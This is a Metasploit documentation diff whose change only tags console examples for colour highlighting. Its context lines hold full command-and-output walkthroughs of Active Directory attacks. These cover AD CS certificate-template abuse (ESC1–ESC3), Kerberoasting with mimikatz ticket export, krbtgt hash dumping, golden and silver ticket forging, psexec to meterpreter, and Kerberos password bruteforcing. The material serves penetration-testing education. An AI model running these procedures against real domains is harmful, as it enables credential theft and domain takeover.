@@ -317,7 +317,7 @@ Getting a certificate as the current user is great, but what we really want to d
 
 If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
 CA => daforest-WIN-BR0CCBA815B-CA
@@ -358,7 +358,7 @@ To do this we will use the `ipcr_cert` module and we will set the usual options,
 
 For the first run, we will set the usual `RHOSTS`, `CA`, and `CERT_TEMPLATE` details, being sure to set `CERT_TEMPLATE` to the vulnerable `ESC2-Template` certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based off of the vulnerable `ESC2-Template`:
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
@@ -425,7 +425,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 
 Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the `PFX` option to specify the PFX file, and the `ON_BEHALF_OF` setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default `User` certificate should work here since it allows enrollment by any authenticated domain user.
 
-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
 
 Module options (auxiliary/admin/dcerpc/icpr_cert):
@@ -540,7 +540,7 @@ Narrowing this list down to those we can actually enroll in as users, this leave
 
 We'll first get the cert using `ipcr_cert` with the `ESC3-Template1` certificate.
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
 
@@ -608,7 +608,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 
 Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
 
-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
 PFX => /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
@@ -662,7 +662,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 
 Just to show this is also possible with `ESC3-Template2` here is a snippet showing that also works:
 
-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template2
 CERT_TEMPLATE => ESC3-Template2
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
@@ -723,7 +723,7 @@ Certificates from Metasploit do not require a password, but if the certificate w
 one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
 run the `GET_TGT` action.
 
-```
+```msf
 msf6 > use kerberos/get_ticket
 
 Matching Modules

--- a/docs/metasploit-framework.wiki/kerberos/kerberoasting.md
+++ b/docs/metasploit-framework.wiki/kerberos/kerberoasting.md
@@ -50,7 +50,7 @@ run rhost=192.168.123.13 user=<username> pass=<password> domain=<domain>
 
 If you followed the lab setup setup above, this should output the following result:
 
-```
+```msf
 msf6 auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local
 
 [*] Running for 192.168.123.13...
@@ -108,7 +108,7 @@ and cracking the hash.
 First an SPN needs to be found. This can be done in a number of ways - including using metasploit's
 very own `auxiliary/gather/ldap_query` module:
 
-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
 RHOSTS => 172.16.199.235
@@ -169,7 +169,7 @@ Great, we now have a couple SPNs to move forward with.
 If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs
 found above:
 
-```
+```msf
 meterpreter > load kiwi
 Loading extension kiwi...
 
@@ -217,7 +217,7 @@ meterpreter > kerberos_ticket_list
 
 **Export Service Tickets**
 
-```
+```msf
 meterpreter > kiwi_cmd kerberos::list /export
 
 [00000001] - 0x00000017 - rc4_hmac_nt
@@ -399,6 +399,6 @@ escalation is also possible as the user can be added into an elevated group such
 The new ticket can be injected back into the memory with the following Mimikatz command in order to perform
 authentication with the targeted service via Kerberos protocol.
 
-```
+```msf
 meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi
 ```

--- a/docs/metasploit-framework.wiki/kerberos/service_authentication.md
+++ b/docs/metasploit-framework.wiki/kerberos/service_authentication.md
@@ -17,7 +17,7 @@ Metasploit currently offers Kerberos authentication for the following services -
 
 Open a WinRM session:
 
-```
+```msf
 msf6 > use auxiliary/scanner/winrm/winrm_login
 msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
 
@@ -42,7 +42,7 @@ C:\Users\Administrator>
 
 Query LDAP for accounts:
 
-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13
@@ -68,7 +68,7 @@ CN=Administrator CN=Users DC=adf3 DC=local
 
 Running psexec against a host:
 
-```
+```msf
 msf6 > use exploit/windows/smb/psexec
 msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
 
@@ -91,7 +91,7 @@ meterpreter >
 
 Connect to a Microsoft SQL Server instance and run a query:
 
-```
+```msf
 msf6 > use auxiliary/admin/mssql/mssql_sql
 msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
@@ -137,7 +137,7 @@ Optional options:
 When a write-enabled `KrbCacheMode` is used, tickets that are issued to Metasploit will be stored for reuse. The `klist`
 command can be used to view tickets. It is a top level command and can be run even if a module is in use.
 
-```
+```msf
 msf6 > klist
 Kerberos Cache
 ==============
@@ -154,7 +154,7 @@ host            principal               sname                              issue
 
 More detailed information can be displayed by using the verbose (`-v` / `--verbose`) option.
 
-```
+```msf
 msf6 > klist -v
 Kerberos Cache
 ==============
@@ -221,7 +221,7 @@ When a ticket (either TGT or TGS) is stored, it is saved along with the other lo
 CCACHE files can be viewed with the `loot --type mit.kerberos.ccache` command (the `--type` argument filters for the
 specified type).
 
-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > loot --type mit.kerberos.ccache
 
 Loot

--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.md
@@ -123,7 +123,7 @@ user set in the `IMPERSONATE` option (default is `Administrator`).
 ## Scenarios
 
 ### Windows Server 2019 Domain Controller with ADCS installed
-```
+```msf
 msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts=192.168.100.104 username=Test password=123456 domain=mylab.local dc_name=DC02 ca=mylab-DC02-CA
 [*] Running module against 192.168.100.104
 
@@ -191,7 +191,7 @@ host             service  type                 name             content         
 ```
 
 ### Using `psexec` with the TGS impersonating the Administrator
-```
+```msf
 msf6 exploit(windows/smb/psexec) > exploit rhosts=192.168.100.104 lhost=192.168.100.1 smbuser=administrator smbdomain=mylab.local Smb::Auth=kerberos Smb::Rhostname=dc02.mylab.local DomainControllerRhost=192.168.100.104
 
 

--- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
@@ -48,7 +48,7 @@ Request a certificate. The certificate PFX file will be stored on success. The c
 For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
 by a normal user via LDAP.
 
-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
 BIND_DN => aliddle@msflab.local
@@ -82,7 +82,7 @@ msf6 auxiliary(gather/ldap_query) >
 In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
 by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -122,7 +122,7 @@ The user must know:
 See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
 information.
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -165,7 +165,7 @@ information.
 #### Step 1
 The first step is to issue a certificate using the vulnerable certificate template.
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert 
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -195,7 +195,7 @@ The second step is to run the module a second time, using the certificate templa
 the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
 template.
 
-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
 PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
@@ -233,7 +233,7 @@ request another certificate on behalf of the target account.
 #### Step 1
 The first step is to issue a certificate using the vulnerable certificate template.
 
-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -265,7 +265,7 @@ The second step is to run the module a second time, using the certificate templa
 the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
 template.
 
-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
 PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre

--- a/documentation/modules/auxiliary/admin/kerberos/forge_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/forge_ticket.md
@@ -60,7 +60,7 @@ For golden ticket attacks, the following information is required:
 
 One way of extracting the krbtgt account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
 
-```
+```msf
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
 [*] Running module against 192.168.123.13
@@ -99,7 +99,7 @@ ADF3\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd
 
 With the above information a golden ticket can be forged:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=767400b2c71afa35a5dca216f2389cd9 user=Administrator
 
 [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
@@ -146,7 +146,7 @@ Example Service Principal Names:
 
 One way of extracting the computer account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
 
-```
+```msf
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
 [*] Running module against 192.168.123.13
@@ -185,7 +185,7 @@ ADF3\DC3$:1001:aad3b435b51404eeaad3b435b51404ee:fbd103200439e14d4c8adad675d5f244
 
 With the above information a silver ticket for SMB can be forged for the target host:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.adf3.local
 
 [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin

--- a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
@@ -75,7 +75,7 @@ Default is `true`.
 
 An example of viewing the Kerberos ticket cache, and requesting a TGT with NT hash:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > klist
 Kerberos Cache
 ==============
@@ -114,7 +114,7 @@ host             port  proto  name      state  info
 
 TGT with encryption key
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGT
 [*] Running module against 10.0.0.24
 
@@ -126,7 +126,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
 
 TGT with password
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGT
 [*] Running module against 10.0.0.24
 
@@ -138,7 +138,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
 
 TGT with certificate
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 cert_file=/home/msfuser/.msf4/loot/20230124155521_default_10.0.0.24_windows.ad.cs_384669.pfx action=GET_TGT
 [*] Running module against 10.0.0.24
 
@@ -153,7 +153,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) >
 
 TGS with NT hash:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
 [*] Running module against 10.0.0.24
 
@@ -175,7 +175,7 @@ host             service  type                 name  content                   i
 
 TGS with encryption key:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
 [*] Running module against 10.0.0.24
 
@@ -188,7 +188,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
 
 TGS with password:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
 [*] Running module against 10.0.0.24
 
@@ -201,7 +201,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
 
 TGS with cached TGT:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > loot
 
 Loot
@@ -223,7 +223,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
 
 TGS without cached TGT:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > loot
 
 Loot
@@ -262,7 +262,7 @@ host             service  type                 name  content                   i
 
 TGS impersonating the Administrator account:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
 [*] Running module against 10.0.0.24
 

--- a/documentation/modules/auxiliary/admin/kerberos/inspect_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/inspect_ticket.md
@@ -16,7 +16,7 @@ Kerberos tickets can be acquired from multiple sources. For instance:
 - Forged using the `forge_ticket` module after compromising the krbtgt or a service account's encryption keys
 - Extracted from memory using Meterpreter and mimikatz:
 
-```
+```msf
 meterpreter > load kiwi
 Loading extension kiwi...
   .#####.   mimikatz 2.2.0 20191125 (x64/windows)
@@ -100,7 +100,7 @@ No other options are used in this action.
 
 **Without Key**
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/inspect_ticket) > run TICKET_PATH=/path/to/ticket
 Primary Principal: Administrator@WINDOMAIN.LOCAL
 Ccache version: 4
@@ -133,7 +133,7 @@ Creds: 1
 
 **With Key**
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
 Primary Principal: Administrator@WINDOMAIN.LOCAL
 Ccache version: 4

--- a/documentation/modules/auxiliary/admin/kerberos/keytab.md
+++ b/documentation/modules/auxiliary/admin/kerberos/keytab.md
@@ -21,7 +21,7 @@ The following actions are supported:
 
 ### List
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/keytab) > run keytab_file=./example.keytab
 
 Keytab entries
@@ -38,7 +38,7 @@ Keytab entries
 
 Adding an entry using a known password hash/key which has been extracted from a Domain Controller - for instance by using the `auxiliary/gather/windows_secrets_dump` module:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=krbtgt realm=DEMO.LOCAL enctype=AES256 key=e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
 
 [*] modifying existing keytab
@@ -47,7 +47,7 @@ msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.key
 
 Adding entries using a specified password:
 
-```
+```msf
 msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=Administrator realm=DEMO.LOCAL enctype=ALL password=p4$$w0rd
 
 [*] modifying existing keytab
@@ -59,7 +59,7 @@ msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.key
 
 Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump
 
-```
+```msf
 # Secrets dump
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
@@ -136,7 +136,6 @@ should be viewable in Wireshark.
 
 For example the previous TGS-REQ authenticator blob is now decrypted in the Wireshark UI. Wireshark on Linux may not show
 the decrypted packet information in the packet details pane, instead it appears as a separate tab in the packet bytes pane:
-
 
 ```
 tgs-req

--- a/documentation/modules/auxiliary/admin/kerberos/ticket_converter.md
+++ b/documentation/modules/auxiliary/admin/kerberos/ticket_converter.md
@@ -13,7 +13,7 @@ Kerberos tickets can be acquired from multiple sources. For instance:
 - Forged using the `forge_ticket` module after compromising the krbtgt or a service account's encryption keys
 - Extracted from memory using Meterpreter and mimikatz:
 
-```
+```msf
 meterpreter > load kiwi
 Loading extension kiwi...
   .#####.   mimikatz 2.2.0 20191125 (x64/windows)
@@ -113,7 +113,7 @@ Set the `InputPath` to the location of your ccache file, specify your desired ou
 Metasploit will automatically detect the file type so there's no need to tell msfconsole whether it's a ccache or kirbi file.
 
 Example:
-```
+```msf
 msf6 auxiliary(admin/kerberos/ticket_converter) > run inputpath=metasploit_ticket.ccache outputpath=metasploit_ticket.kirbi
 
 [*] [2023.01.05-17:01:02] Converting from ccache to kirbi
@@ -132,7 +132,7 @@ Set the `InputPath` to the location of your ccache file, specify your desired ou
 Metasploit will automatically detect the file type so there's no need to tell msfconsole whether it's a ccache or kirbi file.
 
 Example:
-```
+```msf
 msf6 auxiliary(admin/kerberos/ticket_converter) > run inputpath=metasploit_ticket.kirbi outputpath=metasploit_ticket.ccache
 
 [*] [2023.01.05-17:01:39] Converting from kirbi to ccache

--- a/documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md
+++ b/documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md
@@ -98,7 +98,7 @@ that are both vulnerable and enrollable.
 ## Scenarios
 
 ### Windows Server 2022 with AD CS
-```
+```msf
 msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
 RHOST => 172.26.104.157
@@ -238,7 +238,7 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```
 
 ### Windows Server 2022 with AD CS and REPORT_NONENROLLABLE Set To TRUE
-```
+```msf
 msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
 RHOST => 172.26.104.157

--- a/documentation/modules/auxiliary/scanner/kerberos/kerberos_login.md
+++ b/documentation/modules/auxiliary/scanner/kerberos/kerberos_login.md
@@ -26,7 +26,7 @@ Kerberos service on a Domain Controller.
 
 To create a single Kerberos ticket (TGT), set the username and password options:
 
-```
+```msf
 msf6 auxiliary(scanner/kerberos/kerberos_login) > run rhost=192.168.123.133 domain=DEMO.local username=basic_user password=password verbose=true
 [*] Using domain: DEMO.LOCAL - 192.168.123.133:88   ...
 [+] 192.168.123.133 - User found: "basic_user" with password password
@@ -41,10 +41,8 @@ accounts and additionally bruteforcing passwords:
 
 Create a new `./users.txt` file and `./wordlist.txt`, then run the module:
 
-```
+```msf
 msf6 auxiliary(gather/kerberos_enumusers) > run rhost=192.168.123.133 domain=DEMO.local user_file=./users.txt pass_file=./wordlist.txt verbose=true
-[*] Reloading module...
-
 [*] Using domain: DEMO.LOCAL - 192.168.123.133:88   ...
 [+] 192.168.123.133 - User: "basic_user" is present
 [*] 192.168.123.133 - User: "basic_user" wrong password invalid2


### PR DESCRIPTION
Updates the docs site to add color to Metasploit console examples

### Before

Metasploit prompt examples are black and white:

<img width="1443" alt="image" src="https://user-images.githubusercontent.com/60357436/215288734-e2c1d19a-9c60-43cb-ac07-e8a4d397661f.png">


### After

Metasploit examples are now highlighted:

<img width="1443" alt="image" src="https://user-images.githubusercontent.com/60357436/215288757-1aaf42ec-cf1d-4813-a5b9-9e9aa81dc96b.png">

## Verification

- Verify CI build passes
- Build the site locally and verify we're happy with the colors ([steps](https://github.com/rapid7/metasploit-framework/tree/1b20db8900a5534c7e204be6e2e765ea537d2a32/docs))